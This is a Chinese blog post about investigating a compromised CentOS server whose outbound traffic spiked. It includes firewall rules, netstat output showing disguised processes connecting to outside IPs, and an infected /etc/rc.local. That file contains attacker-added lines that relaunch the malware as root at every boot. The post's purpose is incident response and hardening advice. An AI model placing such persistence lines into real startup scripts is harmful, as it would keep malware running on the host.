这里简单说说这次服务器流量跑高（流量异常）的排查过程。
首先我从 Cacti 的监控中发现一台放在机房的服务器流量异常。这里先说明一下什么叫"异常"：这台服务器在交换机上被限速为 2M 峰值，而它的流量却跑到了 100M；按正常情况，服务器把带宽跑满时机器会很卡、远程连接会掉线甚至根本连不上，所以从正常业务流量来看是绝不可能跑到 100M 的，这就是所谓的流量异常。下面给大家看一下图:
一、
发现异常后，我查了资料表，找出这台机器的 IP 地址、系统信息等。
最终确认这是一台 CentOS 5.4 的机器，密码为数字加大小写字母的组合。以下是我在机器上查看到的一些信息:
[root@aaa ~]# iptables -L -n
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:8080
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:22
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
以上是防火墙规则。注意两点：INPUT 链虽然默认 DROP，但 22 端口对 0.0.0.0/0 全开；OUTPUT 链默认 ACCEPT、没有任何限制。所以后面看到的木马进程主动向外连 10991 端口、以及对外大量发包，完全不会被这套规则拦住——INPUT 链的规则对"本机主动向外"的流量是不起作用的。
[root@aaa ~]# netstat -anpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:60003 0.0.0.0:* LISTEN 3552/cupsdd
tcp 0 0 0.0.0.0:5801 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:5802 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2506/mysqld
tcp 0 0 0.0.0.0:14379 0.0.0.0:* LISTEN 3516/ora_d000_thdb
tcp 0 0 0.0.0.0:5803 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:5902 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:5903 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 0 119.57.51.103:80 221.209.56.114:27808 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27807 SYN_RECV -
tcp 0 0 119.57.51.103:80 206.217.132.75:2229 SYN_RECV -
tcp 0 0 119.57.51.103:80 121.232.7.242:51370 SYN_RECV -
tcp 0 0 119.57.51.103:80 182.185.216.13:53534 SYN_RECV -
tcp 0 0 119.57.51.103:80 111.161.23.92:37697 SYN_RECV -
tcp 0 0 119.57.51.103:80 157.55.35.96:18323 SYN_RECV -
tcp 0 0 119.57.51.103:80 125.39.163.95:30525 SYN_RECV -
tcp 0 0 119.57.51.103:80 183.3.87.80:51903 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27806 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27809 SYN_RECV -
tcp 0 0 0.0.0.0:1521 0.0.0.0:* LISTEN 3426/tnslsnr
tcp 0 0 0.0.0.0:6001 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:6003 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 1 127.0.0.1:50865 127.0.0.1:1521 SYN_SENT 3494/ora_pmon_thdb
tcp 0 0 119.57.51.103:32005 202.103.178.76:10991 ESTABLISHED 3648/atdd
tcp 0 0 119.57.51.103:32007 202.103.178.76:10991 ESTABLISHED 4059/atdd
tcp 0 0 119.57.51.103:32006 202.103.178.76:10991 ESTABLISHED 3760/atdd
tcp 0 0 119.57.51.103:32008 202.103.178.76:10991 ESTABLISHED 3881/atdd
tcp 0 0 119.57.51.103:32011 202.103.178.76:10991 ESTABLISHED 4472/atdd
tcp 0 0 119.57.51.103:32012 202.103.178.76:10991 ESTABLISHED 4300/atdd
tcp 0 0 119.57.51.103:32015 202.103.178.76:10991 ESTABLISHED 4617/atdd
tcp 0 0 119.57.51.103:32014 202.103.178.76:10991 ESTABLISHED 4198/atdd
tcp 0 0 119.57.51.103:64255 121.12.110.96:10991 ESTABLISHED 3558/ksapd
tcp 0 0 119.57.51.103:64259 121.12.110.96:10991 ESTABLISHED 3832/ksapd
tcp 0 0 119.57.51.103:64258 121.12.110.96:10991 ESTABLISHED 3652/ksapd
tcp 0 0 119.57.51.103:64257 121.12.110.96:10991 ESTABLISHED 4527/ksapd
tcp 0 1 119.57.51.103:51903 112.90.252.76:10991 SYN_SENT 4544/kysapd
tcp 0 1 119.57.51.103:51902 112.90.252.76:10991 SYN_SENT 4365/kysapd
tcp 0 1 119.57.51.103:51901 112.90.252.76:10991 SYN_SENT 4291/kysapd
tcp 0 1 119.57.51.103:51900 112.90.252.76:10991 SYN_SENT 3978/kysapd
tcp 0 1 119.57.51.103:51899 112.90.252.76:10991 SYN_SENT 3878/kysapd
tcp 0 1 119.57.51.103:51898 112.90.252.76:10991 SYN_SENT 4154/kysapd
tcp 0 1 119.57.51.103:51897 112.90.252.76:10991 SYN_SENT 3709/kysapd
tcp 0 1 119.57.51.103:51896 112.90.252.76:10991 SYN_SENT 3604/kysapd
tcp 0 1 127.0.0.1:5369 127.0.0.1:6113 SYN_SENT 3426/tnslsnr
tcp 0 0 :::80 :::* LISTEN 2879/httpd
tcp 0 0 :::6001 :::* LISTEN 2569/Xvnc
tcp 0 0 :::6002 :::* LISTEN 2613/Xvnc
tcp 0 0 :::6003 :::* LISTEN 2674/Xvnc
tcp 0 0 :::22 :::* LISTEN 2448/sshd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:57650 TIME_WAIT -
tcp 0 64 ::ffff:119.57.51.103:22 ::ffff:119.57.180.130:46177 ESTABLISHED 6691/sshd: root@not
tcp 0 29866 ::ffff:119.57.51.103:80 ::ffff:157.55.32.154:24818 FIN_WAIT1 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:14554 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13526 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:180.173.86.128:1107 TIME_WAIT -
tcp 0 6692 ::ffff:119.57.51.103:22 ::ffff:114.250.249.21:56821 ESTABLISHED 7269/0
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.211:10424 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.190.138.140:35502 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59613 FIN_WAIT2 7271/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59615 ESTABLISHED 7506/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59614 FIN_WAIT2 7507/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59611 FIN_WAIT2 7505/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:183.60.214.28:55574 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.109:46068 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:63141 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:11155 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.127:54739 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:15706 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59617 FIN_WAIT2 7509/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59616 FIN_WAIT2 7508/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13094 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.28.30:29387 TIME_WAIT -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:125.39.172.32:37149 LAST_ACK -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:56558 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13315 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57503 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57499 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:183.60.213.114:45041 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30624 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.21.34:16701 ESTABLISHED 7450/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30626 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30627 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30628 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30620 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:58678 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:206.217.132.75:2132 FIN_WAIT2 7276/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:50474 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3096 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3095 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3094 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3093 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57505 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:64322 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.84:61477 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8203 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8200 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8204 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8218 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30754 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8211 TIME_WAIT -
tcp 0 37440 ::ffff:119.57.51.103:80 ::ffff:118.250.130.121:7924 ESTABLISHED 6929/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8210 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:38531 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8214 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8213 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8212 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9503 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9504 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3231 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3230 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60133 ESTABLISHED 7518/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60132 ESTABLISHED 7512/httpd
tcp 0 21900 ::ffff:119.57.51.103:80 ::ffff:157.55.33.50:48368 ESTABLISHED 7514/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9530 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60134 ESTABLISHED 7442/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60129 ESTABLISHED 7516/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9532 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60131 ESTABLISHED 7517/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60130 ESTABLISHED 7519/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9543 TIME_WAIT -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8519 LAST_ACK -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8520 LAST_ACK -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8521 LAST_ACK -
tcp 0 2602 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:12748 FIN_WAIT1 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:121.232.7.242:51371 TIME_WAIT -
tcp 0 1331 ::ffff:119.57.51.103:80 ::ffff:182.185.216.13:53468 ESTABLISHED 7440/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30810 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57459 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30812 TIME_WAIT -
以上是监听端口及对应进程。可以看到大量 atdd、ksapd、kysapd 进程，还有一个 cupsdd：cupsdd 监听在 60003 端口（名字很像 CUPS 的 cupsd，应该是故意伪装的）；atdd、ksapd、kysapd 各起了多个实例，分别连向 202.103.178.76、121.12.110.96、112.90.252.76 的 10991 端口（ESTABLISHED / SYN_SENT），这些都不是系统正常进程。另外还要留意两条 22 端口的已建立连接：来自 119.57.180.130 的是一个 root 会话，来自 114.250.249.21 的进程名显示为"0"，很不正常，建议对照 last、/var/log/secure 确认是不是自己人。处理之前最好先记下这些 PID，并把 /etc/cupsdd、/etc/atdd、/etc/ksapd、/etc/kysapd 这几个文件（连同 /proc/<pid>/exe、md5sum、文件时间戳）保留一份，方便事后分析。
[root@aaa ~]# cat /etc/rc.local
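#!/bin/sh
# This script will be executed after all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
#
# NOTE(review): this is /etc/rc.local as recovered from the compromised
# host. The three stock header lines above had lost their leading '#' in
# the paste (the page showed them as bare text, which would make the
# script try to run a command named "This"); the '#' is restored here.
# Everything below the header was appended by the attacker and is kept
# verbatim as evidence -- do NOT run this file.
#
# rc.local runs as root at boot, so every line below re-launches the
# malware after each reboot. cupsdd (named to resemble the CUPS daemon,
# presumably on purpose) is started detached via nohup with all output
# discarded; ksapd, kysapd and atdd are run from /etc in the foreground,
# so they appear to daemonize themselves, otherwise boot would hang on
# the first one (not verifiable from this listing alone).
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
# The same four lines are repeated seven more times below -- presumably
# re-appended on every run of the dropper; left exactly as found.
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd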
以上是这台机器的 /etc/rc.local，被加进了很多东西。rc.local 在开机时以 root 身份执行，所以这几个木马进程每次重启都会被重新拉起；上网查了一下，正是它们导致服务器大量向外发包。
以上就是这次案例的文字部分了。在这里提醒大家：密码一定不能简单化，尤其是有公网 IP、而且 22 端口对全网开放的机器。处理方法上，可以把它随机启动的那些文件和它添加的东西全部删掉，但我强烈建议重装系统——攻击者已经拿到了 root 权限，机器上的 ps、netstat 等工具本身都可能被动过手脚，单靠删文件不一定清得干净；而且 rc.local 只是自启动位置之一，crontab、/etc/init.d 等也要一并检查。重装之后记得把 root 以及机器上 MySQL、Oracle、VNC 这些服务的密码全部换掉（攻击者有 root 权限时这些都可能已经泄露），SSH 改成密钥登录或限制来源 IP。安全一定要做好！
————————————————
版权声明:本文为CSDN博主「RedHat-小怪兽」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/redhat_xiaoguaishou/article/details/19042147